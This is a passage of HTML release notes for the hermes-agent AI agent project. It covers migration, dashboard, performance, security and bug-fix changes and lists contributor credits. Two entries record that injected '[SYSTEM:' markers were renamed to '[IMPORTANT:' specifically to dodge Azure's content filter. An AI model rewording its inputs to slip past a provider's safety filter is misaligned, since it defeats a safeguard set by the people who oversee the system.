<h3>OpenClaw migration (for folks coming from OpenClaw)</h3>
<ul>
<li><strong>Hardened OpenClaw import</strong> — plan-first apply, redaction, pre-migration backup (<a href="https://github.com/NousResearch/hermes-agent/pull/16911" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16911/hovercard">#16911</a>)</li>
<li>Fix: case-preserving brand rewrite + one-time <code>~/.openclaw</code> residue banner (<a href="https://github.com/NousResearch/hermes-agent/pull/16327" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16327/hovercard">#16327</a>)</li>
<li>Fix: resolve <code>openclaw</code> workspace files from <code>agents.defaults.workspace</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/16879" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16879/hovercard">#16879</a>)</li>
<li>Fix: resolve model aliases against real OpenClaw catalog schema (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340177843" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/16778" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16778/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/16778">#16778</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/16977" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16977/hovercard">#16977</a>)</li>
</ul>
<hr>
<h2>📊 Web Dashboard</h2>
<ul>
<li><strong>Models tab</strong> — rich per-model analytics (<a href="https://github.com/NousResearch/hermes-agent/pull/17745" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17745/hovercard">#17745</a>)</li>
<li><strong>Configure main + auxiliary models from the Models page</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17802" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17802/hovercard">#17802</a>)</li>
<li><strong>Dashboard Chat tab — xterm.js + JSON-RPC sidecar</strong> (supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292206374" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/12710" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/12710/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/12710">#12710</a> + <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300867799" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/13379" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/13379/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/13379">#13379</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/14890" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14890/hovercard">#14890</a>)</li>
<li><strong>Dashboard layout refresh</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/14899" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14899/hovercard">#14899</a>)</li>
<li><strong><code>--stop</code> and <code>--status</code> flags</strong> on the dashboard CLI (<a href="https://github.com/NousResearch/hermes-agent/pull/17840" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17840/hovercard">#17840</a>)</li>
<li><strong>Page-scoped plugin slots for built-in pages</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15658" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15658/hovercard">#15658</a>)</li>
<li>Fix: replace all buttons for design system buttons (<a href="https://github.com/NousResearch/hermes-agent/pull/17007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17007/hovercard">#17007</a>)</li>
</ul>
<hr>
<h2>⚡ Performance</h2>
<ul>
<li><strong>TUI visible cold start cut ~57%</strong> via lazy agent init (<a href="https://github.com/NousResearch/hermes-agent/pull/17190" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17190/hovercard">#17190</a>)</li>
<li><strong>Lazy-import OpenAI, Anthropic, Firecrawl, account_usage</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17046" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17046/hovercard">#17046</a>)</li>
<li><strong>mtime-cache <code>load_config()</code> and <code>read_raw_config()</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17041" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17041/hovercard">#17041</a>)</li>
<li><strong>Memoize <code>get_tool_definitions()</code> + TTL-cache <code>check_fn</code> results</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17098" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17098/hovercard">#17098</a>)</li>
<li><strong>Precompile DANGEROUS_PATTERNS and HARDLINE_PATTERNS</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17206" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17206/hovercard">#17206</a>)</li>
<li><strong>Cache Ink text measurements across yoga flex re-passes</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/14818" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14818/hovercard">#14818</a>)</li>
<li><strong>Stabilize long-session scrolling</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15926" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15926/hovercard">#15926</a>)</li>
<li><strong>Lazily seed virtual history heights</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16523" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16523/hovercard">#16523</a>)</li>
</ul>
<hr>
<h2>🔒 Security &amp; Reliability</h2>
<ul>
<li><strong>Secret redaction off by default</strong> — stops corrupting patches / API payloads with fake-key substitutions. Opt in via <code>redaction.enabled: true</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/16794" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16794/hovercard">#16794</a>)</li>
<li><strong><code>[SYSTEM:</code> → <code>[IMPORTANT:</code></strong> in all user-injected markers (Azure content filter dodge) (<a href="https://github.com/NousResearch/hermes-agent/pull/16114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16114/hovercard">#16114</a>)</li>
<li><strong>Hardline blocklist for unrecoverable commands</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15878" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15878/hovercard">#15878</a>)</li>
<li><strong>Canonical <code>mask_secret</code> helper; fix status.py DIM drift</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17207" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17207/hovercard">#17207</a>)</li>
<li><strong>Sweep expired paste.rs uploads on a real timer</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16431" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16431/hovercard">#16431</a>)</li>
<li><strong>Preserve symlinks during atomic file writes</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16980" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16980/hovercard">#16980</a>)</li>
<li><strong>Probe <code>/dev/tty</code> by opening it, not bare existence</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17024" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17024/hovercard">#17024</a>)</li>
</ul>
<hr>
<h2>🐛 Notable Bug Fixes</h2>
<p>This window includes 360 <code>fix:</code> PRs. Selected highlights from across the stack:</p>
<ul>
<li><strong>Background review fork inherits parent's live runtime</strong> — provider/model/creds now propagate correctly (<a href="https://github.com/NousResearch/hermes-agent/pull/16099" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16099/hovercard">#16099</a>)</li>
<li><strong>Hindsight configurable <code>HINDSIGHT_TIMEOUT</code> env var</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15077" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15077/hovercard">#15077</a>)</li>
<li><strong>Tools: normalize numeric entries + clear stale <code>no_mcp</code> in <code>_save_platform_tools</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15607" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15607/hovercard">#15607</a>)</li>
<li><strong>MCP: rewrite <code>definitions</code> refs to <code>$defs</code> in input schemas</strong> — closes provider-side 400s</li>
<li><strong>Azure content filter compatibility</strong> — renamed <code>[SYSTEM:</code> markers so Azure's content filter stops flagging them (<a href="https://github.com/NousResearch/hermes-agent/pull/16114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16114/hovercard">#16114</a>)</li>
<li><strong>Vision cache uses HERMES_HOME instead of cwd</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17719" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17719/hovercard">#17719</a>)</li>
<li><strong>FTS5 search</strong> — tool_name + tool_calls indexing with repair + migration (<a href="https://github.com/NousResearch/hermes-agent/pull/16914" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16914/hovercard">#16914</a>)</li>
<li><strong>Streaming reasoning persists on assistant turns</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16892" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16892/hovercard">#16892</a>)</li>
<li><strong>execute_code concurrent RPC serialization</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355471738" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17770" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/17770/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/17770">#17770</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/17894" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17894/hovercard">#17894</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/17902" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17902/hovercard">#17902</a>)</li>
<li><strong>Background reviewer scoped to memory + skills toolsets</strong> — no more accidental web/shell escapes (<a href="https://github.com/NousResearch/hermes-agent/pull/16569" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16569/hovercard">#16569</a>)</li>
<li><strong>Compression recovery</strong> — retry on main before giving up; notify user when aux fails (<a href="https://github.com/NousResearch/hermes-agent/pull/16774" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16774/hovercard">#16774</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16775" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16775/hovercard">#16775</a>)</li>
<li><strong><code>croniter</code> promoted to a core dependency</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17577" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17577/hovercard">#17577</a>)</li>
<li><strong>Discord tool <code>limit</code> parameter coerced to int</strong> before <code>min()</code> call (<a href="https://github.com/NousResearch/hermes-agent/pull/16319" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16319/hovercard">#16319</a>)</li>
<li><strong>Yuanbao messaging platform entrance fix</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/16880" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16880/hovercard">#16880</a>)</li>
<li><strong>ACP advertise and forward image prompts</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/18030" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/18030/hovercard">#18030</a>)</li>
<li><strong>DeepSeek / Kimi reasoning content isolation</strong> across cross-provider histories (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zjianru/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zjianru">@Zjianru</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/15749" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15749/hovercard">#15749</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/15762" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15762/hovercard">#15762</a>)</li>
<li><strong>Preserve reasoning_content replay on DeepSeek v4 + Kimi/Moonshot thinking</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/18045" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/18045/hovercard">#18045</a>)</li>
</ul>
<p>The vast majority of the 360 fixes landed in the streaming/compression/tool-calling paths across all providers — DeepSeek, Kimi, Moonshot, GLM, Qwen, MiniMax, Gemini, Anthropic, OpenAI — alongside TUI polish (resize, scroll, sticky-prompt) and gateway platform-specific edge cases.</p>
<hr>
<h2>🧪 Testing &amp; CI</h2>
<ul>
<li>Hermetic test parity (<code>scripts/run_tests.sh</code>) held across this window</li>
<li><strong>Microsoft Teams xdist collision guard</strong> — prevents worker collisions when Teams platform tests run in parallel (<a href="https://github.com/NousResearch/hermes-agent/pull/17828" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17828/hovercard">#17828</a>)</li>
<li>Chore: remove unused imports and dead locals (ruff F401, F841) (<a href="https://github.com/NousResearch/hermes-agent/pull/17010" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17010/hovercard">#17010</a>)</li>
</ul>
<hr>
<h2>📚 Documentation</h2>
<ul>
<li><strong>Curator feature page</strong> added to docs site (<a href="https://github.com/NousResearch/hermes-agent/pull/17563" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17563/hovercard">#17563</a>)</li>
<li><strong>Document pin also blocking <code>skill_manage</code> writes</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17578/hovercard">#17578</a>)</li>
<li><strong>Direct-URL skill install documented</strong> across features, reference, guide, and <code>hermes-agent</code> skill (<a href="https://github.com/NousResearch/hermes-agent/pull/16355" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16355/hovercard">#16355</a>)</li>
<li><strong>Hooks tutorial — build a BOOT.md startup checklist</strong> (replaces the removed built-in hook) (<a href="https://github.com/NousResearch/hermes-agent/pull/17202" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17202/hovercard">#17202</a>)</li>
<li><strong>ComfyUI docs: ask local vs cloud FIRST before hardware check</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/17612" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17612/hovercard">#17612</a>)</li>
<li><strong>Obliteratus skill: link YouTube video guide in SKILL.md</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15808" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15808/hovercard">#15808</a>)</li>
<li>Per-skill docs pages generated for bundled + optional skills; ASCII art code blocks auto-wrapped (<a href="https://github.com/NousResearch/hermes-agent/pull/14929" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/14929/hovercard">#14929</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/16497" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16497/hovercard">#16497</a>)</li>
</ul>
<hr>
<h2>⚖️ Removed / Reverted</h2>
<ul>
<li><strong>Kanban multi-profile collaboration board</strong> — landed in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331105463" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/16081" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16081/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/16081">#16081</a>, reverted in (<a href="https://github.com/NousResearch/hermes-agent/pull/16098" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16098/hovercard">#16098</a>) while the design is reworked</li>
<li><strong>computer-use cua-driver</strong> — 3 preparatory PRs landed then were reverted in (<a href="https://github.com/NousResearch/hermes-agent/pull/16927" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16927/hovercard">#16927</a>)</li>
<li><strong>BOOT.md built-in hook</strong> removed (<a href="https://github.com/NousResearch/hermes-agent/pull/17093" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17093/hovercard">#17093</a>); the hooks tutorial (<a href="https://github.com/NousResearch/hermes-agent/pull/17202" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17202/hovercard">#17202</a>) shows how to build the same workflow yourself with a shell hook</li>
<li><strong><code>/provider</code> + <code>/plan</code> slash commands dropped</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15047" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15047/hovercard">#15047</a>)</li>
<li><strong><code>flush_memories</code> removed entirely</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/15696" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15696/hovercard">#15696</a>)</li>
</ul>
<hr>
<h2>👥 Contributors</h2>
<h3>Core</h3>
<ul>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a></strong> (Teknium)</li>
</ul>
<h3>Top Community Contributors (by merged PR count since v0.11.0)</h3>
<ul>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a></strong> (Brooklyn) — 52 PRs · TUI — light-terminal detection + pluggable busy styles + auto-resume + session-delete from /resume + mouse-wheel scrolling + xterm.js dashboard Chat tab + cold-start cut + accordion polish</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a></strong> — 12 PRs · LM Studio first-class provider (salvage), Vercel Sandbox backend, GMI Cloud salvage, bundled-by-default touchdesigner-mcp, many tool-call / reasoning fixes</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a></strong> — 10 PRs · MCP schema robustness, assorted stability fixes</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a></strong> — 8 PRs · trigram FTS5 CJK search, declarative Nix plugin install, matrix/feishu hints and fixes</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a></strong> — 4 PRs</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a></strong> — 4 PRs · LaTeX rendering in TUI, dashboard layout refresh</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a></strong> — 3 PRs · Docker run-as-host-user so bind mounts don't get root-owned</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vominh1919/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vominh1919">@vominh1919</a></strong> — 2 PRs</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stephenschoettler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stephenschoettler">@stephenschoettler</a></strong> — 2 PRs</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kevin-ho/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kevin-ho">@kevin-ho</a></strong> — ConPTY mouse-injection fix (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326910636" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15488" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15488/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/15488">#15488</a>)</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zjianru/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zjianru">@Zjianru</a></strong> — cross-provider reasoning_content isolation + DeepSeek/Kimi empty-reasoning injection (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328871924" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15749" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15749/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/15749">#15749</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329009564" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15762" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15762/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/15762">#15762</a>)</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a></strong> — Telegram chat allowlists for groups and forums (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321989919" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/15027" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/15027/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/15027">#15027</a>)</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a></strong> — 9 new TouchDesigner-MCP reference docs (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340067733" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/16768" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16768/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/16768">#16768</a>)</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xDevNinja/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xDevNinja">@0xDevNinja</a></strong> — curator <code>restore_skill</code> nested-archive fix (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358056461" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17951" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17951/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/17951">#17951</a>)</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/y0shua1ee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/y0shua1ee">@y0shua1ee</a></strong> — curator <code>use</code> activity fix (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358097284" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/17953" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/17953/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/17953">#17953</a>)</li>
</ul>
<h3>Also contributing</h3>
<p>Salvaged or co-authored work from <strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/isaachuangGMICLOUD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/isaachuangGMICLOUD">@isaachuangGMICLOUD</a></strong> (GMI Cloud), earlier upstream PRs from the original author of each salvage chain, and a long tail of one-shot fixes, documentation nudges, and skill contributions from the community.</p>
<h3>All Contributors (alphabetical, excluding <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</h3>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xbyt4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xbyt4">@0xbyt4</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xharryriddle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xharryriddle">@0xharryriddle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xDevNinja/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xDevNinja">@0xDevNinja</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0z1-ghb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0z1-ghb">@0z1-ghb</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/5park1e/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/5park1e">@5park1e</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/A-FdL-Prog/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/A-FdL-Prog">@A-FdL-Prog</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aj-nt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aj-nt">@aj-nt</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akhater/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akhater">@akhater</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alblez/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alblez">@alblez</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexg0bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexg0bot">@alexg0bot</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexzhu0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexzhu0">@alexzhu0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AllardQuek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AllardQuek">@AllardQuek</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amanning3390/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amanning3390">@amanning3390</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amanuel2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amanuel2">@amanuel2</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AndreKurait/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AndreKurait">@AndreKurait</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrewhosf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrewhosf">@andrewhosf</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Andy283/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Andy283">@Andy283</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyylin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyylin">@andyylin</a>,<br>
